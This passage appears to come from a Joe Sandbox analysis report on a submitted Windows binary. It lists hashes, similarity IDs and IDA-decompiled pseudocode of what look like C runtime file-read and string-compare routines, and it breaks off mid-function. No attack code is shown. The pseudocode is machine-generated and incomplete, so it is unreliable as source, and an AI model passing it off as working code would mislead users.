                                                                                      APIs
                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 00416E89
                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 00416F97
                                                                                      • _UnwindNestedFrames.LIBCMT ref: 004170E9
                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 00417104
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                      • String ID: csm$csm$csm
                                                                                      • API String ID: 2751267872-393685449
                                                                                      • Opcode ID: 318b65572e5b20ef664c6f281c360e51d1affc593d55bd890a21b263122f1374
                                                                                      • Instruction ID: 455451be4c744c07c9f1c348f90df5655159583fb695b03a0c52ad18e5ab1787
                                                                                      • Opcode Fuzzy Hash: 318b65572e5b20ef664c6f281c360e51d1affc593d55bd890a21b263122f1374
                                                                                      • Instruction Fuzzy Hash: B9B18772904209EFCF25DFA5C8819EFBBB5BF08314B15415BE8156B302D339DA91CB99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 77%
                                                                                      			E00424EBD(signed int _a4, void* _a8, unsigned int _a12) {
                                                                                      				signed int _v5;
                                                                                      				signed int _v12;
                                                                                      				void* _v16;
                                                                                      				signed int _v20;
                                                                                      				long _v24;
                                                                                      				void* _v28;
                                                                                      				char _v32;
                                                                                      				void* _v36;
                                                                                      				long _v40;
                                                                                      				signed int* _t132;
                                                                                      				signed int _t134;
                                                                                      				signed int _t135;
                                                                                      				long _t138;
                                                                                      				signed int _t141;
                                                                                      				signed int _t143;
                                                                                      				signed char _t145;
                                                                                      				intOrPtr _t153;
                                                                                      				long _t155;
                                                                                      				signed int _t156;
                                                                                      				signed int _t157;
                                                                                      				signed int _t159;
                                                                                      				long _t160;
                                                                                      				intOrPtr _t165;
                                                                                      				signed int _t166;
                                                                                      				intOrPtr _t168;
                                                                                      				signed int _t170;
                                                                                      				signed int _t172;
                                                                                      				char _t174;
                                                                                      				char _t179;
                                                                                      				char _t184;
                                                                                      				signed char _t191;
                                                                                      				long _t197;
                                                                                      				signed int _t200;
                                                                                      				intOrPtr _t203;
                                                                                      				long _t204;
                                                                                      				signed int _t205;
                                                                                      				unsigned int _t208;
                                                                                      				signed int _t210;
                                                                                      				signed int _t216;
                                                                                      				signed char _t217;
                                                                                      				long _t218;
                                                                                      				long _t219;
                                                                                      				void* _t220;
                                                                                      				signed int _t221;
                                                                                      				char* _t223;
                                                                                      				char* _t224;
                                                                                      				char* _t225;
                                                                                      				signed int _t230;
                                                                                      				signed int _t231;
                                                                                      				void* _t235;
                                                                                      				void* _t237;
                                                                                      				void* _t238;
                                                                                      				void* _t239;
                                                                                      
                                                                                      				_t200 = _a4;
                                                                                      				_t238 = _t237 - 0x24;
                                                                                      				if(_t200 != 0xfffffffe) {
                                                                                      					__eflags = _t200;
                                                                                      					if(_t200 < 0) {
                                                                                      						L60:
                                                                                      						_t132 = E0041CA40();
                                                                                      						 *_t132 =  *_t132 & 0x00000000;
                                                                                      						__eflags =  *_t132;
                                                                                      						 *((intOrPtr*)(E0041CA53())) = 9;
                                                                                      						L61:
                                                                                      						_t134 = E0041804F();
                                                                                      						goto L62;
                                                                                      					}
                                                                                      					__eflags = _t200 -  *0x444d30; // 0x40
                                                                                      					if(__eflags >= 0) {
                                                                                      						goto L60;
                                                                                      					}
                                                                                      					_t216 = _t200 >> 6;
                                                                                      					_t230 = (_t200 & 0x0000003f) * 0x38;
                                                                                      					_v12 = _t216;
                                                                                      					_v32 = 1;
                                                                                      					_t138 =  *((intOrPtr*)(0x444b30 + _t216 * 4));
                                                                                      					_v24 = _t138;
                                                                                      					_v20 = _t230;
                                                                                      					_t217 =  *((intOrPtr*)(_t138 + _t230 + 0x28));
                                                                                      					_v5 = _t217;
                                                                                      					__eflags = 1 & _t217;
                                                                                      					if((1 & _t217) == 0) {
                                                                                      						goto L60;
                                                                                      					}
                                                                                      					_t218 = _a12;
                                                                                      					__eflags = _t218 - 0x7fffffff;
                                                                                      					if(_t218 <= 0x7fffffff) {
                                                                                      						__eflags = _t218;
                                                                                      						if(_t218 == 0) {
                                                                                      							L59:
                                                                                      							_t135 = 0;
                                                                                      							goto L63;
                                                                                      						}
                                                                                      						__eflags = _v5 & 0x00000002;
                                                                                      						if((_v5 & 0x00000002) != 0) {
                                                                                      							goto L59;
                                                                                      						}
                                                                                      						__eflags = _a8;
                                                                                      						if(_a8 == 0) {
                                                                                      							goto L6;
                                                                                      						}
                                                                                      						_t141 =  *((intOrPtr*)(_t138 + _t230 + 0x29));
                                                                                      						_v5 = _t141;
                                                                                      						_v28 =  *((intOrPtr*)(_t138 + _t230 + 0x18));
                                                                                      						_t235 = 0;
                                                                                      						_t143 = _t141 - 1;
                                                                                      						__eflags = _t143;
                                                                                      						if(_t143 == 0) {
                                                                                      							_t145 =  !_t218;
                                                                                      							__eflags = 1 & _t145;
                                                                                      							if((1 & _t145) == 0) {
                                                                                      								L14:
                                                                                      								 *(E0041CA40()) =  *_t146 & _t235;
                                                                                      								 *((intOrPtr*)(E0041CA53())) = 0x16;
                                                                                      								E0041804F();
                                                                                      								goto L40;
                                                                                      							} else {
                                                                                      								_t219 = _t218 >> 1;
                                                                                      								_t197 = 4;
                                                                                      								__eflags = _t219 - 1;
                                                                                      								if(_t219 >= 1) {
                                                                                      									_t197 = _t219;
                                                                                      								}
                                                                                      								_t235 = E00421D39(_t197);
                                                                                      								E00421955(0);
                                                                                      								E00421955(0);
                                                                                      								_t239 = _t238 + 0xc;
                                                                                      								_v16 = _t235;
                                                                                      								__eflags = _t235;
                                                                                      								if(_t235 != 0) {
                                                                                      									_t153 = E00425463(_t219, _a4, 0, 0, 1);
                                                                                      									_t238 = _t239 + 0x10;
                                                                                      									_t203 =  *((intOrPtr*)(0x444b30 + _v12 * 4));
                                                                                      									 *((intOrPtr*)(_t230 + _t203 + 0x20)) = _t153;
                                                                                      									 *(_t230 + _t203 + 0x24) = _t219;
                                                                                      									_t220 = _t235;
                                                                                      									_t155 =  *((intOrPtr*)(0x444b30 + _v12 * 4));
                                                                                      									L22:
                                                                                      									_v24 = _t155;
                                                                                      									L23:
                                                                                      									_t204 = _v24;
                                                                                      									_t230 = 0;
                                                                                      									_t156 = _v20;
                                                                                      									_v36 = _t220;
                                                                                      									__eflags =  *(_t156 + _t204 + 0x28) & 0x00000048;
                                                                                      									_t205 = _a4;
                                                                                      									if(( *(_t156 + _t204 + 0x28) & 0x00000048) != 0) {
                                                                                      										_t174 =  *((intOrPtr*)(_t156 + _v24 + 0x2a));
                                                                                      										_t223 = _v16;
                                                                                      										__eflags = _t174 - 0xa;
                                                                                      										if(_t174 != 0xa) {
                                                                                      											__eflags = _t197;
                                                                                      											if(_t197 != 0) {
                                                                                      												_t230 = 1;
                                                                                      												 *_t223 = _t174;
                                                                                      												_t224 = _t223 + 1;
                                                                                      												_t197 = _t197 - 1;
                                                                                      												__eflags = _v5;
                                                                                      												_v16 = _t224;
                                                                                      												 *((char*)(_v20 +  *((intOrPtr*)(0x444b30 + _v12 * 4)) + 0x2a)) = 0xa;
                                                                                      												_t205 = _a4;
                                                                                      												if(_v5 != 0) {
                                                                                      													_t179 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x444b30 + _v12 * 4)) + 0x2b));
                                                                                      													_t205 = _a4;
                                                                                      													__eflags = _t179 - 0xa;
                                                                                      													if(_t179 != 0xa) {
                                                                                      														__eflags = _t197;
                                                                                      														if(_t197 != 0) {
                                                                                      															 *_t224 = _t179;
                                                                                      															_t225 = _t224 + 1;
                                                                                      															_t197 = _t197 - 1;
                                                                                      															__eflags = _v5 - 1;
                                                                                      															_v16 = _t225;
                                                                                      															_t230 = 2;
                                                                                      															 *((char*)(_v20 +  *((intOrPtr*)(0x444b30 + _v12 * 4)) + 0x2b)) = 0xa;
                                                                                      															_t205 = _a4;
                                                                                      															if(_v5 == 1) {
                                                                                      																_t184 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x444b30 + _v12 * 4)) + 0x2c));
                                                                                      																_t205 = _a4;
                                                                                      																__eflags = _t184 - 0xa;
                                                                                      																if(_t184 != 0xa) {
                                                                                      																	__eflags = _t197;
                                                                                      																	if(_t197 != 0) {
                                                                                      																		 *_t225 = _t184;
                                                                                      																		_t197 = _t197 - 1;
                                                                                      																		__eflags = _t197;
                                                                                      																		_v16 = _t225 + 1;
                                                                                      																		_t230 = 3;
                                                                                      																		 *((char*)(_v20 +  *((intOrPtr*)(0x444b30 + _v12 * 4)) + 0x2c)) = 0xa;
                                                                                      																	}
                                                                                      																}
                                                                                      															}
                                                                                      														}
                                                                                      													}
                                                                                      												}
                                                                                      											}
                                                                                      										}
                                                                                      									}
                                                                                      									_t157 = E0042C287(_t205);
                                                                                      									__eflags = _t157;
                                                                                      									if(_t157 == 0) {
                                                                                      										L43:
                                                                                      										_v32 = 0;
                                                                                      										L44:
                                                                                      										_t198 = _v16;
                                                                                      										_t159 = ReadFile(_v28, _v16, _t197,  &_v24, 0);
                                                                                      										__eflags = _t159;
                                                                                      										if(_t159 == 0) {
                                                                                      											L55:
                                                                                      											_t160 = GetLastError();
                                                                                      											_t230 = 5;
                                                                                      											__eflags = _t160 - _t230;
                                                                                      											if(_t160 != _t230) {
                                                                                      												__eflags = _t160 - 0x6d;
                                                                                      												if(_t160 != 0x6d) {
                                                                                      													L39:
                                                                                      													E0041C9F9(_t160);
                                                                                      													goto L40;
                                                                                      												}
                                                                                      												_t231 = 0;
                                                                                      												goto L41;
                                                                                      											}
                                                                                      											 *((intOrPtr*)(E0041CA53())) = 9;
                                                                                      											 *(E0041CA40()) = _t230;
                                                                                      											goto L40;
                                                                                      										}
                                                                                      										_t208 = _a12;
                                                                                      										__eflags = _v24 - _t208;
                                                                                      										if(_v24 > _t208) {
                                                                                      											goto L55;
                                                                                      										}
                                                                                      										_t231 = _t230 + _v24;
                                                                                      										__eflags = _t231;
                                                                                      										L47:
                                                                                      										_t221 = _v20;
                                                                                      										_t165 =  *((intOrPtr*)(0x444b30 + _v12 * 4));
                                                                                      										__eflags =  *((char*)(_t221 + _t165 + 0x28));
                                                                                      										if( *((char*)(_t221 + _t165 + 0x28)) < 0) {
                                                                                      											__eflags = _v5 - 2;
                                                                                      											if(_v5 == 2) {
                                                                                      												__eflags = _v32;
                                                                                      												_push(_t231 >> 1);
                                                                                      												_push(_v36);
                                                                                      												_push(_a4);
                                                                                      												if(_v32 == 0) {
                                                                                      													_t166 = E00424A2F();
                                                                                      												} else {
                                                                                      													_t166 = E00424D2E();
                                                                                      												}
                                                                                      											} else {
                                                                                      												_t209 = _t208 >> 1;
                                                                                      												__eflags = _t208 >> 1;
                                                                                      												_t166 = E00424BD7(_t208 >> 1, _t208 >> 1, _a4, _t198, _t231, _a8, _t209);
                                                                                      											}
                                                                                      											_t231 = _t166;
                                                                                      										}
                                                                                      										goto L41;
                                                                                      									}
                                                                                      									_t210 = _v20;
                                                                                      									_t168 =  *((intOrPtr*)(0x444b30 + _v12 * 4));
                                                                                      									__eflags =  *((char*)(_t210 + _t168 + 0x28));
                                                                                      									if( *((char*)(_t210 + _t168 + 0x28)) >= 0) {
                                                                                      										goto L43;
                                                                                      									}
                                                                                      									_t170 = GetConsoleMode(_v28,  &_v40);
                                                                                      									__eflags = _t170;
                                                                                      									if(_t170 == 0) {
                                                                                      										goto L43;
                                                                                      									}
                                                                                      									__eflags = _v5 - 2;
                                                                                      									if(_v5 != 2) {
                                                                                      										goto L44;
                                                                                      									}
                                                                                      									_t107 =  &_v16; // 0xa
                                                                                      									_t198 =  *_t107;
                                                                                      									_t172 = ReadConsoleW(_v28,  *_t107, _t197 >> 1,  &_v24, 0);
                                                                                      									__eflags = _t172;
                                                                                      									if(_t172 != 0) {
                                                                                      										_t208 = _a12;
                                                                                      										_t231 = _t230 + _v24 * 2;
                                                                                      										goto L47;
                                                                                      									}
                                                                                      									_t160 = GetLastError();
                                                                                      									goto L39;
                                                                                      								} else {
                                                                                      									 *((intOrPtr*)(E0041CA53())) = 0xc;
                                                                                      									 *(E0041CA40()) = 8;
                                                                                      									L40:
                                                                                      									_t231 = _t230 | 0xffffffff;
                                                                                      									__eflags = _t231;
                                                                                      									L41:
                                                                                      									E00421955(_t235);
                                                                                      									_t135 = _t231;
                                                                                      									goto L63;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						__eflags = _t143 == 1;
                                                                                      						if(_t143 == 1) {
                                                                                      							_t191 =  !_t218;
                                                                                      							__eflags = 1 & _t191;
                                                                                      							if((1 & _t191) != 0) {
                                                                                      								_t155 = _v24;
                                                                                      								_t197 = _t218;
                                                                                      								_t220 = _a8;
                                                                                      								_v16 = _t220;
                                                                                      								goto L22;
                                                                                      							}
                                                                                      							goto L14;
                                                                                      						} else {
                                                                                      							_t197 = _t218;
                                                                                      							_t220 = _a8;
                                                                                      							_v16 = _t220;
                                                                                      							goto L23;
                                                                                      						}
                                                                                      					}
                                                                                      					L6:
                                                                                      					 *(E0041CA40()) =  *_t139 & 0x00000000;
                                                                                      					 *((intOrPtr*)(E0041CA53())) = 0x16;
                                                                                      					goto L61;
                                                                                      				} else {
                                                                                      					 *(E0041CA40()) =  *_t192 & 0x00000000;
                                                                                      					_t134 = E0041CA53();
                                                                                      					 *_t134 = 9;
                                                                                      					L62:
                                                                                      					_t135 = _t134 | 0xffffffff;
                                                                                      					L63:
                                                                                      					return _t135;
                                                                                      				}
                                                                                      			}
























































                                                                                      0x00424ec2
                                                                                      0x00424ec5
                                                                                      0x00424ecd
                                                                                      0x00424ee7
                                                                                      0x00424ee9
                                                                                      0x0042523d
                                                                                      0x0042523d
                                                                                      0x00425242
                                                                                      0x00425242
                                                                                      0x0042524a
                                                                                      0x00425250
                                                                                      0x00425250
                                                                                      0x00000000
                                                                                      0x00425250
                                                                                      0x00424eef
                                                                                      0x00424ef5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00424eff
                                                                                      0x00424f05
                                                                                      0x00424f0a
                                                                                      0x00424f0e
                                                                                      0x00424f11
                                                                                      0x00424f18
                                                                                      0x00424f1b
                                                                                      0x00424f1e
                                                                                      0x00424f22
                                                                                      0x00424f25
                                                                                      0x00424f27
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00424f2d
                                                                                      0x00424f30
                                                                                      0x00424f36
                                                                                      0x00424f50
                                                                                      0x00424f52
                                                                                      0x00425239
                                                                                      0x00425239
                                                                                      0x00000000
                                                                                      0x00425239
                                                                                      0x00424f58
                                                                                      0x00424f5c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00424f62
                                                                                      0x00424f66
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00424f6d
                                                                                      0x00424f71
                                                                                      0x00424f74
                                                                                      0x00424f77
                                                                                      0x00424f7c
                                                                                      0x00424f7c
                                                                                      0x00424f7f
                                                                                      0x00424fc6
                                                                                      0x00424fc8
                                                                                      0x00424fca
                                                                                      0x00424f9b
                                                                                      0x00424fa0
                                                                                      0x00424fa7
                                                                                      0x00424fad
                                                                                      0x00000000
                                                                                      0x00424fcc
                                                                                      0x00424fce
                                                                                      0x00424fd0
                                                                                      0x00424fd1
                                                                                      0x00424fd3
                                                                                      0x00424fd5
                                                                                      0x00424fd5
                                                                                      0x00424fdf
                                                                                      0x00424fe1
                                                                                      0x00424fe8
                                                                                      0x00424fed
                                                                                      0x00424ff0
                                                                                      0x00424ff3
                                                                                      0x00424ff5
                                                                                      0x0042501b
                                                                                      0x00425023
                                                                                      0x00425026
                                                                                      0x0042502d
                                                                                      0x00425034
                                                                                      0x00425038
                                                                                      0x0042503a
                                                                                      0x00425041
                                                                                      0x00425041
                                                                                      0x00425044
                                                                                      0x00425044
                                                                                      0x00425047
                                                                                      0x00425049
                                                                                      0x0042504c
                                                                                      0x0042504f
                                                                                      0x00425054
                                                                                      0x00425057
                                                                                      0x00425060
                                                                                      0x00425064
                                                                                      0x00425067
                                                                                      0x00425069
                                                                                      0x0042506f
                                                                                      0x00425071
                                                                                      0x0042507a
                                                                                      0x0042507b
                                                                                      0x0042507d
                                                                                      0x00425081
                                                                                      0x00425082
                                                                                      0x00425086
                                                                                      0x00425090
                                                                                      0x00425095
                                                                                      0x00425098
                                                                                      0x004250a7
                                                                                      0x004250ab
                                                                                      0x004250ae
                                                                                      0x004250b0
                                                                                      0x004250b2
                                                                                      0x004250b4
                                                                                      0x004250b9
                                                                                      0x004250bb
                                                                                      0x004250bf
                                                                                      0x004250c0
                                                                                      0x004250c6
                                                                                      0x004250d0
                                                                                      0x004250d1
                                                                                      0x004250d6
                                                                                      0x004250d9
                                                                                      0x004250e8
                                                                                      0x004250ec
                                                                                      0x004250ef
                                                                                      0x004250f1
                                                                                      0x004250f3
                                                                                      0x004250f5
                                                                                      0x004250f7
                                                                                      0x004250fd
                                                                                      0x004250fd
                                                                                      0x004250fe
                                                                                      0x0042510d
                                                                                      0x0042510e
                                                                                      0x0042510e
                                                                                      0x004250f5
                                                                                      0x004250f1
                                                                                      0x004250d9
                                                                                      0x004250b4
                                                                                      0x004250b0
                                                                                      0x00425098
                                                                                      0x00425071
                                                                                      0x00425069
                                                                                      0x00425114
                                                                                      0x0042511a
                                                                                      0x0042511c
                                                                                      0x0042518d
                                                                                      0x0042518d
                                                                                      0x00425191
                                                                                      0x00425198
                                                                                      0x0042519f
                                                                                      0x004251a5
                                                                                      0x004251a7
                                                                                      0x00425205
                                                                                      0x00425205
                                                                                      0x0042520d
                                                                                      0x0042520e
                                                                                      0x00425210
                                                                                      0x00425229
                                                                                      0x0042522c
                                                                                      0x00425169
                                                                                      0x0042516a
                                                                                      0x00000000
                                                                                      0x0042516f
                                                                                      0x00425232
                                                                                      0x00000000
                                                                                      0x00425232
                                                                                      0x00425217
                                                                                      0x00425222
                                                                                      0x00000000
                                                                                      0x00425222
                                                                                      0x004251a9
                                                                                      0x004251ac
                                                                                      0x004251af
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004251b1
                                                                                      0x004251b1
                                                                                      0x004251b4
                                                                                      0x004251b7
                                                                                      0x004251ba
                                                                                      0x004251c1
                                                                                      0x004251c6
                                                                                      0x004251c8
                                                                                      0x004251cc
                                                                                      0x004251e7
                                                                                      0x004251eb
                                                                                      0x004251ec
                                                                                      0x004251ef
                                                                                      0x004251f2
                                                                                      0x004251fe
                                                                                      0x004251f4
                                                                                      0x004251f4
                                                                                      0x004251f4
                                                                                      0x004251ce
                                                                                      0x004251ce
                                                                                      0x004251ce
                                                                                      0x004251d9
                                                                                      0x004251de
                                                                                      0x004251e1
                                                                                      0x004251e1
                                                                                      0x00000000
                                                                                      0x004251c6
                                                                                      0x00425121
                                                                                      0x00425124
                                                                                      0x0042512b
                                                                                      0x00425130
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00425139
                                                                                      0x0042513f
                                                                                      0x00425141
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00425143
                                                                                      0x00425147
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00425152
                                                                                      0x00425152
                                                                                      0x00425159
                                                                                      0x0042515f
                                                                                      0x00425161
                                                                                      0x00425185
                                                                                      0x00425188
                                                                                      0x00000000
                                                                                      0x00425188
                                                                                      0x00425163
                                                                                      0x00000000
                                                                                      0x00424ff7
                                                                                      0x00424ffc
                                                                                      0x00425007
                                                                                      0x00425170
                                                                                      0x00425170
                                                                                      0x00425170
                                                                                      0x00425173
                                                                                      0x00425174
                                                                                      0x0042517a
                                                                                      0x00000000
                                                                                      0x0042517c
                                                                                      0x00424ff5
                                                                                      0x00424fca
                                                                                      0x00424f81
                                                                                      0x00424f84
                                                                                      0x00424f95
                                                                                      0x00424f97
                                                                                      0x00424f99
                                                                                      0x00424fb7
                                                                                      0x00424fba
                                                                                      0x00424fbc
                                                                                      0x00424fbf
                                                                                      0x00000000
                                                                                      0x00424fbf
                                                                                      0x00000000
                                                                                      0x00424f86
                                                                                      0x00424f86
                                                                                      0x00424f88
                                                                                      0x00424f8b
                                                                                      0x00000000
                                                                                      0x00424f8b
                                                                                      0x00424f84
                                                                                      0x00424f38
                                                                                      0x00424f3d
                                                                                      0x00424f45
                                                                                      0x00000000
                                                                                      0x00424ecf
                                                                                      0x00424ed4
                                                                                      0x00424ed7
                                                                                      0x00424edc
                                                                                      0x00425255
                                                                                      0x00425255
                                                                                      0x00425258
                                                                                      0x0042525b
                                                                                      0x0042525b

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3907804496
                                                                                      • Opcode ID: 027cffd80b248f9111e38d4e84972a07742920da0dbb45e1389d0a2bc35ff269
                                                                                      • Instruction ID: c73ddf4e9d04ad7a9feba274aac19e014be5869e09d570f887e00602c23fd8a4
                                                                                      • Opcode Fuzzy Hash: 027cffd80b248f9111e38d4e84972a07742920da0dbb45e1389d0a2bc35ff269
                                                                                      • Instruction Fuzzy Hash: 7DB13470F04659AFDB11DF99E880BBE7BB1EF85304F44419AE40097392CB789D41CB69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 82%
                                                                                      			E00430686(signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, int _a20, intOrPtr* _a24, intOrPtr* _a28, int _a32) {
                                                                                      				signed int _v8;
                                                                                      				char _v22;
                                                                                      				struct _cpinfo _v28;
                                                                                      				signed int _v32;
                                                                                      				intOrPtr* _v36;
                                                                                      				signed int _v40;
                                                                                      				intOrPtr _v44;
                                                                                      				void* _v56;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				signed int _t49;
                                                                                      				int _t54;
                                                                                      				signed int _t59;
                                                                                      				signed int _t60;
                                                                                      				void* _t63;
                                                                                      				signed int _t64;
                                                                                      				signed int _t65;
                                                                                      				int _t71;
                                                                                      				char* _t76;
                                                                                      				char* _t77;
                                                                                      				int _t81;
                                                                                      				int _t82;
                                                                                      				intOrPtr _t94;
                                                                                      				intOrPtr _t95;
                                                                                      				signed int _t103;
                                                                                      				void* _t104;
                                                                                      				int _t106;
                                                                                      				void* _t107;
                                                                                      				intOrPtr* _t108;
                                                                                      
                                                                                      				_t49 =  *0x443048; // 0x9900ec21
                                                                                      				_v8 = _t49 ^ _t103;
                                                                                      				_t83 = _a24;
                                                                                      				_v40 = _a4;
                                                                                      				_t102 = _a20;
                                                                                      				_v44 = _a8;
                                                                                      				_t53 = _a16;
                                                                                      				_v32 = _a16;
                                                                                      				_v36 = _a24;
                                                                                      				if(_t102 <= 0) {
                                                                                      					if(_t102 < 0xffffffff) {
                                                                                      						goto L54;
                                                                                      					} else {
                                                                                      						goto L3;
                                                                                      					}
                                                                                      				} else {
                                                                                      					_t81 = E0041D20D(_t53, _t102);
                                                                                      					_t83 = _v36;
                                                                                      					_t102 = _t81;
                                                                                      					L3:
                                                                                      					_t101 = _a28;
                                                                                      					if(_t101 <= 0) {
                                                                                      						if(_t101 < 0xffffffff) {
                                                                                      							goto L54;
                                                                                      						} else {
                                                                                      							goto L6;
                                                                                      						}
                                                                                      					} else {
                                                                                      						_t101 = E0041D20D(_t83, _t101);
                                                                                      						_a28 = _t101;
                                                                                      						L6:
                                                                                      						_t82 = _a32;
                                                                                      						if(_t82 == 0) {
                                                                                      							_t82 =  *( *_v40 + 8);
                                                                                      							_a32 = _t82;
                                                                                      						}
                                                                                      						if(_t102 == 0 || _t101 == 0) {
                                                                                      							if(_t102 == _t101) {
                                                                                      								L61:
                                                                                      								_push(2);
                                                                                      								goto L23;
                                                                                      							} else {
                                                                                      								if(_t101 > 1) {
                                                                                      									L32:
                                                                                      									_t54 = 1;
                                                                                      								} else {
                                                                                      									if(_t102 > 1) {
                                                                                      										L22:
                                                                                      										_push(3);
                                                                                      										goto L23;
                                                                                      									} else {
                                                                                      										if(GetCPInfo(_t82,  &_v28) == 0) {
                                                                                      											goto L54;
                                                                                      										} else {
                                                                                      											if(_t102 <= 0) {
                                                                                      												if(_t101 <= 0) {
                                                                                      													goto L33;
                                                                                      												} else {
                                                                                      													if(_v28 >= 2) {
                                                                                      														_t76 =  &_v22;
                                                                                      														if(_v22 != 0) {
                                                                                      															_t101 = _v36;
                                                                                      															while(1) {
                                                                                      																_t94 =  *((intOrPtr*)(_t76 + 1));
                                                                                      																if(_t94 == 0) {
                                                                                      																	goto L32;
                                                                                      																}
                                                                                      																_t100 =  *_t101;
                                                                                      																if(_t100 <  *_t76 || _t100 > _t94) {
                                                                                      																	_t76 = _t76 + 2;
                                                                                      																	if( *_t76 != 0) {
                                                                                      																		continue;
                                                                                      																	} else {
                                                                                      																		goto L32;
                                                                                      																	}
                                                                                      																} else {
                                                                                      																	goto L61;
                                                                                      																}
                                                                                      																goto L55;
                                                                                      															}
                                                                                      														}
                                                                                      													}
                                                                                      													goto L32;
                                                                                      												}
                                                                                      											} else {
                                                                                      												if(_v28 >= 2) {
                                                                                      													_t77 =  &_v22;
                                                                                      													if(_v22 != 0) {
                                                                                      														_t102 = _v32;
                                                                                      														while(1) {
                                                                                      															_t95 =  *((intOrPtr*)(_t77 + 1));
                                                                                      															if(_t95 == 0) {
                                                                                      																goto L22;
                                                                                      															}
                                                                                      															_t100 =  *_t102;
                                                                                      															if(_t100 <  *_t77 || _t100 > _t95) {
                                                                                      																_t77 = _t77 + 2;
                                                                                      																if( *_t77 != 0) {
                                                                                      																	continue;
                                                                                      																} else {
                                                                                      																	goto L22;
                                                                                      																}
                                                                                      															} else {
                                                                                      																goto L61;
                                                                                      															}
                                                                                      															goto L23;
                                                                                      														}
                                                                                      													}
                                                                                      												}
                                                                                      												goto L22;
                                                                                      												L23:
                                                                                      												_pop(_t54);
                                                                                      											}
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      						} else {
                                                                                      							L33:
                                                                                      							_t59 = E00427CB5(_t82, 9, _v32, _t102, 0, 0);
                                                                                      							_t106 = _t104 + 0x18;
                                                                                      							_v40 = _t59;
                                                                                      							if(_t59 == 0) {
                                                                                      								L54:
                                                                                      								_t54 = 0;
                                                                                      							} else {
                                                                                      								_t100 = _t59 + _t59 + 8;
                                                                                      								asm("sbb eax, eax");
                                                                                      								_t60 = _t59 & _t59 + _t59 + 0x00000008;
                                                                                      								if(_t60 == 0) {
                                                                                      									L60:
                                                                                      									_push(0);
                                                                                      									goto L59;
                                                                                      								} else {
                                                                                      									if(_t60 > 0x400) {
                                                                                      										_t82 = E00421D39(_t60);
                                                                                      										if(_t82 == 0) {
                                                                                      											goto L60;
                                                                                      										} else {
                                                                                      											 *_t82 = 0xdddd;
                                                                                      											goto L40;
                                                                                      										}
                                                                                      									} else {
                                                                                      										E00413C50(_t60);
                                                                                      										_t82 = _t106;
                                                                                      										if(_t82 == 0) {
                                                                                      											goto L60;
                                                                                      										} else {
                                                                                      											 *_t82 = 0xcccc;
                                                                                      											L40:
                                                                                      											_t82 = _t82 + 8;
                                                                                      											if(_t82 == 0) {
                                                                                      												goto L60;
                                                                                      											} else {
                                                                                      												_t102 = _a32;
                                                                                      												_t63 = E00427CB5(_a32, 1, _v32, _a32, _t82, _v40);
                                                                                      												_t107 = _t106 + 0x18;
                                                                                      												if(_t63 == 0) {
                                                                                      													L58:
                                                                                      													_push(_t82);
                                                                                      													L59:
                                                                                      													E00413149();
                                                                                      													goto L53;
                                                                                      												} else {
                                                                                      													_t101 = _v36;
                                                                                      													_t64 = E00427CB5(_t102, 9, _v36, _v36, 0, 0);
                                                                                      													_t108 = _t107 + 0x18;
                                                                                      													_v32 = _t64;
                                                                                      													if(_t64 == 0) {
                                                                                      														goto L58;
                                                                                      													} else {
                                                                                      														_t100 = _t64 + _t64 + 8;
                                                                                      														asm("sbb eax, eax");
                                                                                      														_t65 = _t64 & _t64 + _t64 + 0x00000008;
                                                                                      														if(_t65 == 0) {
                                                                                      															L57:
                                                                                      															_push(0);
                                                                                      															goto L52;
                                                                                      														} else {
                                                                                      															if(_t65 > 0x400) {
                                                                                      																_t101 = E00421D39(_t65);
                                                                                      																if(_t101 == 0) {
                                                                                      																	goto L57;
                                                                                      																} else {
                                                                                      																	 *_t101 = 0xdddd;
                                                                                      																	goto L49;
                                                                                      																}
                                                                                      															} else {
                                                                                      																E00413C50(_t65);
                                                                                      																_t101 = _t108;
                                                                                      																if(_t101 == 0) {
                                                                                      																	goto L57;
                                                                                      																} else {
                                                                                      																	 *_t101 = 0xcccc;
                                                                                      																	L49:
                                                                                      																	_t101 = _t101 + 8;
                                                                                      																	if(_t101 == 0) {
                                                                                      																		goto L57;
                                                                                      																	} else {
                                                                                      																		if(E00427CB5(_t102, 1, _v36, _a28, _t101, _v32) != 0) {
                                                                                      																			_t71 = E00423281(_v44, _a12, _t82, _v40, _t101, _v32, 0, 0, 0);
                                                                                      																			_t102 = _t71;
                                                                                      																			E00413149(_t101);
                                                                                      																			E00413149(_t82);
                                                                                      																			_t54 = _t71;
                                                                                      																		} else {
                                                                                      																			_push(_t101);
                                                                                      																			L52:
                                                                                      																			E00413149();
